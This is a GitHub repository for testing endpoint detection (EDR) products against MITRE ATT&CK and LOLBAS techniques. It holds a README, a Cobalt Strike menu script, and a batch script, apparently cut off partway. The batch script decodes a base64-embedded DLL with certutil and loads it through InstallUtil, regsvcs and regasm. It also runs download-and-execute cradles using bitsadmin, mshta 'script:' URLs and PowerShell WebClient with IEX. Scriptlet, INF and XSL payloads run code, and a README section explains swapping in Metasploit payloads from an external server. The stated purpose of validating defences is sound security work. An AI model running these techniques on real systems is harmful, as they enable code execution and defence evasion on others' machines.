├── Cobalt
    └── EDR-TEST.CNA
├── LICENSE
├── Payloads
    ├── Cmstp.inf
    ├── Cmstp_calc.sct
    ├── CradleTest.txt
    ├── Mshta_calc.sct
    ├── Wmic_calc.xsl
    ├── calc-exec.sdb
    ├── calc.inf
    ├── notepad.msi
    ├── test
    └── test.sct
├── README.md
└── runtests.bat


/Cobalt/EDR-TEST.CNA:
--------------------------------------------------------------------------------
 1 | popup beacon_bottom {
 2 | 
 3 | 	menu "EDR TEST" {		
 4 | 			
 5 | 		item "RUN ALL TESTS" {
 6 | 			 bupload($1, script_resource("../runtests.bat"));
 7 | 	         bshell($1, "runtests.bat");		
 8 | 			}
 9 | 			
10 | 		item "REMOVE RUNTEST.BAT" {
11 | 	         bshell($1, "del /y runtests.bat");		
12 | 			}		
13 | 		
14 | 	}
15 | }


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2018 op7ic
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Payloads/Cmstp.inf:
--------------------------------------------------------------------------------
 1 | [version]
 2 | Signature=$chicago$
 3 | AdvancedINF=2.5
 4 | 
 5 | [DefaultInstall_SingleUser]
 6 | UnRegisterOCXs=UnRegisterOCXSection
 7 | 
 8 | [UnRegisterOCXSection]
 9 | %11%\scrobj.dll,NI,https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct
10 | 
11 | [Strings]
12 | AppAct = "SOFTWARE\Microsoft\Connection Manager"
13 | ServiceName="Yay"
14 | ShortSvcName="Yay"


--------------------------------------------------------------------------------
/Payloads/Cmstp_calc.sct:
--------------------------------------------------------------------------------
 1 | <?XML version="1.0"?>
 2 | <scriptlet>
 3 | <registration 
 4 |     progid="PoC"
 5 |     classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 6 | 	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
 7 | 
 8 | 	<!-- .sct files when downloaded, are executed from a path like this -->
 9 | 	<!-- Please Note, file extenstion does not matter -->
10 | 	<!-- Though, the name and extension are arbitary.. -->
11 | 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
12 | 	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
13 |   	<!-- You can either execute locally, or from a url -->
14 | 	<script language="JScript">
15 | 		<![CDATA[
16 | 	    		// calc.exe should launch, this could be any arbitrary code.
17 |       	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
18 | 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
19 | 	
20 | 		]]>
21 | </script>
22 | </registration>
23 | </scriptlet>


--------------------------------------------------------------------------------
/Payloads/CradleTest.txt:
--------------------------------------------------------------------------------
 1 | # Script found here: https://pastebin.com/FvASwLVQ
 2 | [System.Diagnostics.Process]::Start("calc.exe")
 3 | 
 4 | Write-Host "THIS CRADLE WORKED!!!" -NoNewLine -ForegroundColor Yellow
 5 | Write-Host " --" -NoNewLine -ForegroundColor White
 6 | Write-Host " SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" -ForegroundColor Green
 7 | 
 8 | Function Inv`oke-Mimi`katz
 9 | {
10 | Param(
11 | 	[Parameter(ParameterSetName = "DumpCreds", Position = 0)]
12 |     [Switch]
13 | 	$DumpCreds
14 | )
15 | 
16 | 	#Write-Host "You shouldn't run Invoke-Mimikatz without express written consent from client." -ForegroundColor Yellow
17 | 	
18 | 	$MimikatzCoffeeAscii = "
19 |     ( (
20 |      ) )
21 |   .______.
22 |   |      |]
23 |   \      /
24 |    ``----'
25 | 	"
26 | 
27 |     $Results  = @()
28 |     $Results += "You shouldn't run Invoke-Mimikatz without express written consent from client."
29 |     $Results += $MimikatzCoffeeAscii
30 |     $Results += "^ Mimikatz coffee ASCII art."
31 |     $Results += "That Benjamin DELPY (@gentilkiwi) is a funny guy :)"
32 |     $Results += "Normally creds will be here, but you get the picture."
33 | 
34 |     Return $Results
35 | }
36 | 
37 | Write-Host "`nFunction" -NoNewLine -ForegroundColor White
38 | Write-Host " Invoke-Mimikatz" -NoNewLine -ForegroundColor Green
39 | Write-Host " (tutorial version strictly for lulz) has now been set." -ForegroundColor White
40 | Write-Host "You can test it by running:" -NoNewLine -ForegroundColor White
41 | Write-Host " Invoke-Mimikatz -DumpCreds" -NoNewLine -ForegroundColor Green
42 | Write-host " (or" -NoNewLine -ForegroundColor White
43 | Write-Host " -DumpCr" -NoNewLine -ForegroundColor Green
44 | Write-Host " for short).`n" -ForegroundColor White


--------------------------------------------------------------------------------
/Payloads/Mshta_calc.sct:
--------------------------------------------------------------------------------
 1 | <?XML version="1.0"?>
 2 | <scriptlet>
 3 | 
 4 | <registration
 5 |     description="Bandit"
 6 |     progid="Bandit"
 7 |     version="1.00"
 8 |     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
 9 | 	>
10 | 
11 | 	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
12 | 	<!-- DFIR -->
13 | 	<!--		.sct files are downloaded and executed from a path like this -->
14 | 	<!-- Though, the name and extension are arbitary.. -->
15 | 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
16 | 	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
17 | 
18 | 
19 | 	<!-- Proof Of Concept - Casey Smith @subTee -->
20 | 	<script language="JScript">
21 | 		<![CDATA[
22 | 
23 | 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
24 | 
25 | 		]]>
26 | 	</script>
27 | </registration>
28 | 
29 | <public>
30 |     <method name="Exec"></method>
31 | </public>
32 | <script language="JScript">
33 | <![CDATA[
34 | 
35 | 	function Exec()
36 | 	{
37 | 		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
38 | 	}
39 | 
40 | ]]>
41 | </script>
42 | 
43 | </scriptlet>


--------------------------------------------------------------------------------
/Payloads/Wmic_calc.xsl:
--------------------------------------------------------------------------------
 1 | <?xml version='1.0'?>
 2 | <stylesheet
 3 | xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
 4 | xmlns:user="placeholder"
 5 | version="1.0">
 6 | <output method="text"/>
 7 | 	<ms:script implements-prefix="user" language="JScript">
 8 | 	<![CDATA[
 9 | 	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
10 | 	]]> </ms:script>
11 | </stylesheet>


--------------------------------------------------------------------------------
/Payloads/calc-exec.sdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/5243e8f68c358e521f54ce988902b52103276c31/Payloads/calc-exec.sdb


--------------------------------------------------------------------------------
/Payloads/calc.inf:
--------------------------------------------------------------------------------
1 | [Version] 
2 | Signature=$CHICAGO$
3 | 
4 | [DefaultInstall]
5 | UnregisterDlls = Squiblydoo
6 | 
7 | [Squiblydoo]
8 | 11,,scrobj.dll,2,60,https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct


--------------------------------------------------------------------------------
/Payloads/notepad.msi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/5243e8f68c358e521f54ce988902b52103276c31/Payloads/notepad.msi


--------------------------------------------------------------------------------
/Payloads/test:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0"?>
 2 | 
 3 | <package>
 4 | <component id="testCalc">
 5 | 
 6 | <script language="JScript">
 7 | <![CDATA[
 8 | var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
 9 | ]]>
10 | </script>
11 | 
12 | </component>
13 | </package>


--------------------------------------------------------------------------------
/Payloads/test.sct:
--------------------------------------------------------------------------------
 1 | <?XML version="1.0"?>
 2 | <scriptlet>
 3 | 
 4 | <registration
 5 |     description="Bandit"
 6 |     progid="Bandit"
 7 |     version="1.00"
 8 |     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
 9 |     remotable="true"
10 | 	>
11 | </registration>
12 | 
13 | <script language="JScript">
14 | <![CDATA[
15 | 
16 | 		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
17 | 	
18 | 	
19 | ]]>
20 | </script>
21 | 
22 | </scriptlet>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # EDR-Testing-Script
 2 | 
 3 | This repository contains simple script to test EDR solutions against Mitre ATT&CK/LOLBAS/Invoke-CradleCrafter frameworks. This project is very much in its infancy right now. It is written as a single batch script so it can be easily uploaded and run (as opposed to un-zipped, compiled and installed). The script can run either as a normal user or as Administrator however not giving it high privilages will fail some tests.
 4 | 
 5 | Right now this script only works on Windows and should work with most security endpoint solutions.
 6 | 
 7 | **How To**
 8 | 
 9 | Run the [runtests](runtests.bat) script and observe alerts coming to your EDR console. Cross-verify these alerts to check if your EDR solution identified them correctly. Most tests will just execute calc.exe but it can be easily modified to try to download and exec i.e. Mimikatz. DO NOT USE THIS SCRIPTS ON PRODUCTION SYSTEMS, INSTEAD DEPLOY THIS IN A VM WITH EDR. 
10 | 
11 | **Why**
12 | 
13 | Because it is hard to figure out how accurate EDR's are. Most EDR solutions are sold as silver bullet for security but it is actually difficult to check how many different malicious attacks are correctly identified and contained. [MITRE](https://attack.mitre.org/wiki/Main_Page) & [LOLBAS](https://github.com/api0cradle/LOLBAS ) do pretty good job at mapping common tools and techniques which are being used by attackers out there to pivot, execute code and progress through internal networks and this tool will executes these attacks to helps organizations verify the accuracy of deployed EDR product. 
14 | 
15 | **Weaponization** 
16 | 
17 | The script executes calc.exe. You can replace this easily with metasploit executable where needed but payloads will need to be modified to reflect this. As payloads are hosted on GitHub, if you really want to test your EDR I would suggest to move them to hosted server somewhere else as GitHub is generally not considered malicious. In theory, serving malicious payload (i.e. metasploit) hosted on external server would be much better way of detecting if EDR triggers or not against specific technique.
18 | 
19 | **Tested On**
20 | 
21 | * Windows 7 x86
22 | * Windows 7 x64
23 | * Windows 10 x64
24 | 
25 | **Coverage**
26 | 
27 | The following techniques are currently covered by this script: 
28 | 
29 | | [ATT&CK](https://attack.mitre.org/)  | [LOLBAS](https://github.com/LOLBAS-Project/LOLBAS) | [Invoke-CradleCrafter](https://github.com/danielbohannon/Invoke-CradleCrafter)  | Custom | Variants | [Invoke-DOSfuscation](https://github.com/danielbohannon/Invoke-DOSfuscation) | 
30 | | ------------- | ------------- | ------------- | ------------- | ------------- | ------------- | 
31 | | T1197  | msiexec.exe  | MEMORY\PSWEBSTRING | winnt32 |  bitsadmin regsrv32  | BINARY\CMD\1 | 
32 | | T1118  | diskshadow.exe  | MEMORY\PSWEBDATA | winrs | manage-bde.wsf + rundll32 JS | BINARY\CMD\2 | 
33 | | T1170  | esentutl.exe | MEMORY\PSWEBOPENREAD | waitfor | | BINARY\CMD\3 |
34 | | T1086  | replace.exe | MEMORY\NETWEBSTRING | .SettingContent-ms file  | | BINARY\PS\1 | 
35 | | T1121  | SyncAppvPublishingServer | MEMORY\NETWEBDATA | | | BINARY\PS\2 |
36 | | T1117  | hh.exe | MEMORY\NETWEBOPENREAD | | | BINARY\PS\3 |
37 | | T1127  | ieexec.exe | MEMORY\PSWEBREQUEST | | | ENCODING\1 |
38 | | T1047  | Setupapi | MEMORY\PSRESTMETHOD | | | ENCODING\2 |
39 | | T1128  | Shdocvw | MEMORY\NETWEBREQUEST | | | ENCODING\3 |
40 | | T1085  | csc.exe | MEMORY\PSSENDKEYS | | | PAYLOAD\CONCAT\1 |
41 | | T1130  | advpack.dll | MEMORY\PSCOMWORD | | | PAYLOAD\CONCAT\2 |
42 | | T1191  | Scriptrunner | MEMORY\PSCOMEXCEL | | | PAYLOAD\CONCAT\3 |
43 | | T1202  | sc | MEMORY\PSCOMIE | | | PAYLOAD\REVERSE\1 |
44 | | T1028  | Register-cimprovider | MEMORY\PSCOMMSXML | | | PAYLOAD\REVERSE\2 |
45 | | T1053  | control.exe | MEMORY\PSINLINECSHARP | | | PAYLOAD\REVERSE\3 |
46 | | T1216  | manage-bde.wsf | MEMORY\PSCOMPILEDCSHARP | | | PAYLOAD\FORCODE\1 |
47 | | T1218  | AppVLP.exe | MEMORY\CERTUTIL | | | PAYLOAD\FORCODE\2 |
48 | | T1033  | ScriptRunner.exe | DISK\PSWEBFILE | | | PAYLOAD\FORCODE\3 |
49 | | T1140  | Pester.bat | DISK\PSBITS | | | PAYLOAD\FINCODE\1 |
50 | | T1183  | powershellcustomhost.exe | DISK\BITSADMIN | | | PAYLOAD\FINCODE\2 |
51 | | T1096  | PresentationHost.exe | DISK\CERTUTIL | | | PAYLOAD\FINCODE\3 |
52 | | T1055  | Command Processor Registry | |
53 | | T1015  | gpup.exe | |
54 | | T1138  | VBoxDrvInst | | 
55 | | | InstallHinfSection | |
56 | | | Atbroker | |
57 | | | msconfig | |
58 | | | dnscmd | | 
59 | | | java.exe | | 
60 | | | WseClientSvc.exe | |
61 | 
62 | 
63 | **Run with Metasploit**
64 | 
65 | If you want to run this script as part of Purple Team exercise then simple MSF module execution will do:
66 | 
67 | ```
68 | msf > use post/multi/manage/upload_exec
69 | msf post(upload_exec) > set lfile /tmp/runtests.bat
70 | lfile => /tmp/runtests.bat
71 | msf post(upload_exec) > set rfile C:\\Users\\Public\\runtests.bat
72 | rfile => C:\\Users\\Public\\runtests.bat
73 | msf post(upload_exec) > set session 1
74 | session => 1
75 | msf post(upload_exec) > run
76 | ```
77 | 
78 | **Run with Cobalt Strike**
79 | 
80 | Using plugin in Cobalt folder, simply load it and click "EDR TEST > RUN ALL TESTS" against specified target.
81 | 
82 | **Thanks** 
83 | 
84 | Everyone working on awesome projects like [LOLBAS](https://github.com/LOLBAS-Project/LOLBAS) or [Invoke-CradleCrafter](https://github.com/danielbohannon/Invoke-CradleCrafter) 


--------------------------------------------------------------------------------
/runtests.bat:
--------------------------------------------------------------------------------
   1 | REM Source of inspiration: https://github.com/api0cradle/LOLBAS/tree/master/OSBinaries
   2 | REM Source of inspiration: https://attack.mitre.org/wiki/Main_Page
   3 | REM Source of inspiration: https://github.com/danielbohannon/Invoke-CradleCrafter
   4 | REM Author: op7ic
   5 | REM Description:
   6 | REM Test the detection of various scripts/downloads/execs against your EDR solution.
   7 | REM
   8 | REM Warning:
   9 | REM You might have to click on few windows to close script execution. Don't run this on live system instead run this in a VM with EDR installed!
  10 | REM
  11 | REM Version: 0.4a
  12 | REM
  13 | REM Version History:
  14 | REM 0.4a - Added Invoke-CradleCrafter payloads
  15 | REM 0.3a - More LOLBAS checks 
  16 | REM 0.2a - More ATT&CK / LOLBAS checks
  17 | REM      - Mapped out available tests in README.md
  18 | REM 0.1a - Basic ATT&CK / LOLBAS checks added
  19 | 
  20 | echo **********************************************
  21 | echo *          EDR Testing Script                *
  22 | echo *          Version: 0.4a                     *
  23 | echo *          author: op7ic                     *
  24 | echo *                                            *
  25 | echo *                                            *
  26 | echo *                                            *
  27 | echo **********************************************
  28 | 
  29 | echo [+] Starting script execution at %time% %date%
  30 | echo %time% %date%: [+] Dumping DLL file which runs calc.exe (x86)
  31 | REM - DLL taken from https://github.com/peterferrie/win-exec-calc-shellcode
  32 | echo -----BEGIN CERTIFICATE----- > fi.b64
  33 | echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  34 | echo AAAAAAAAAAAAAAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v >> fi.b64
  35 | echo dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACpUmPY7TMNi+0zDYvtMw2L >> fi.b64
  36 | echo i93Di+wzDYvtMw2L7DMNiy07RIvsMw2LLTtKi+wzDYtSaWNo7TMNiwAAAAAAAAAA >> fi.b64
  37 | echo AAAAAAAAAAAAAAAAAAAAAFBFAABMAQMAwd7lUgAAAAAAAAAA4AAOIQsBBwoAAgAA >> fi.b64
  38 | echo AAQAAAAAAAAAEAAAABAAAAAgAAAAAAAQABAAAAACAAAEAAAAAAAAAAQAAAAAAAAA >> fi.b64
  39 | echo AEAAAAAEAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAgAABYAAAA >> fi.b64
  40 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAACAAAAAAAAAAAAAAA >> fi.b64
  41 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  42 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABdAAAAABAAAAACAAAABAAA >> fi.b64
  43 | echo AAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAWAAAAAAgAAAAAgAAAAYAAAAAAAAAAAAA >> fi.b64
  44 | echo AAAAAEAAAEAucmVsb2MAAAgAAAAAMAAAAAIAAAAIAAAAAAAAAAAAAAAAAABAAABC >> fi.b64
  45 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  46 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  47 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  48 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  49 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  50 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  51 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  52 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  53 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  54 | echo AAAAAAAAAAAAAAAAAAAAAFWL7OgIAAAAM8BdwgwAzMxgMdJSaGNhbGNUWVJRZIty >> fi.b64
  55 | echo MIt2DIt2DK2LMIt+GItfPItcH3iLdB8gAf6LVB8kD7csF0JCrYE8B1dpbkV18It0 >> fi.b64
  56 | echo HxwB/gM8rv/XWFhhwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  57 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  58 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  59 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  60 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  61 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  62 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  63 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  64 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  65 | echo AAAAAMHe5VIAAAAAMiAAAAEAAAABAAAAAQAAACggAAAsIAAAMCAAAAAQAABMIAAA >> fi.b64
  66 | echo AAB3MzItZGxsLXJ1bi1zaGVsbGNvZGUuZGxsAF9EbGxNYWluQDEyAAAAAAAAAAAA >> fi.b64
  67 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  68 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  69 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  70 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  71 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  72 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  73 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  74 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  75 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAA >> fi.b64
  76 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  77 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  78 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  79 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  80 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  81 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  82 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  83 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  84 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  85 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> fi.b64
  86 | echo AAAAAAAAAAAAAAAAAAAAAA== >> fi.b64
  87 | echo -----END CERTIFICATE----- >> fi.b64
  88 | 
  89 | echo **********************************************
  90 | echo *      Testing Mitre ATT&CK PAYLOADS         *
  91 | echo **********************************************
  92 | 
  93 | echo %time% %date%: [+] T1140 - Decoding AllTheThings.dll file with Certutil
  94 | start "" cmd /c certutil -f -decode fi.b64 AllTheThings.dll >nul
  95 | echo Command Excuted: certutil -f -decode fi.b64 AllTheThings.dll
  96 | 
  97 | timeout 5
  98 | 
  99 | echo %time% %date% [+] T1197 - Testing bitsadmin download
 100 | start "" cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "%cd%\Default_File_Path.ps1"
 101 | echo Execution Finished at %time% %date%
 102 | echo Command Excuted: bitsadmin.exe /transfer /Download https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path.ps1
 103 | start "" cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
 104 | echo Command Excuted:powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
 105 | echo Execution Finished at %time% %date%
 106 | 
 107 | timeout 5
 108 | 
 109 | echo %time% %date% [+] T1118 - Testing InstallUtil x86"
 110 | start "" cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
 111 | echo Execution Finished at %time% %date%
 112 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
 113 | timeout 5
 114 | 
 115 | echo %time% %date% [+] T1118 - Testing InstallUtil x64
 116 | start "" cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
 117 | echo Execution Finished at %time% %date%
 118 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
 119 | 
 120 | timeout 5
 121 | 
 122 | echo %time% %date% [+] T1170 - Testing mshtha
 123 | start "" cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
 124 | echo Execution Finished at %time% %date%
 125 | echo Command Excuted: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
 126 | timeout 5
 127 | 
 128 | echo %time% %date% [+] T1086 - Testing powershell cradle - WebClient
 129 | start "" cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
 130 | echo Execution Finished at %time% %date%
 131 | echo Command Excuted: powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
 132 | timeout 5
 133 | 
 134 | 
 135 | echo %time% %date% [+] T1121 - Testing regsvcs
 136 | start "" cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
 137 | echo Execution Finished at %time% %date%
 138 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
 139 | start "" cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll
 140 | echo Execution Finished at %time% %date%
 141 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll
 142 | echo Execution Finished at %time% %date%
 143 | start "" cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll
 144 | echo Execution Finished at %time% %date%
 145 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll
 146 | start "" cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
 147 | echo Execution Finished at %time% %date%
 148 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
 149 | 
 150 | timeout 5
 151 | 
 152 | echo %time% %date% [+] T1121 - Testing regasm
 153 | start "" cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll
 154 | echo Execution Finished at %time% %date%
 155 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll
 156 | start "" cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll
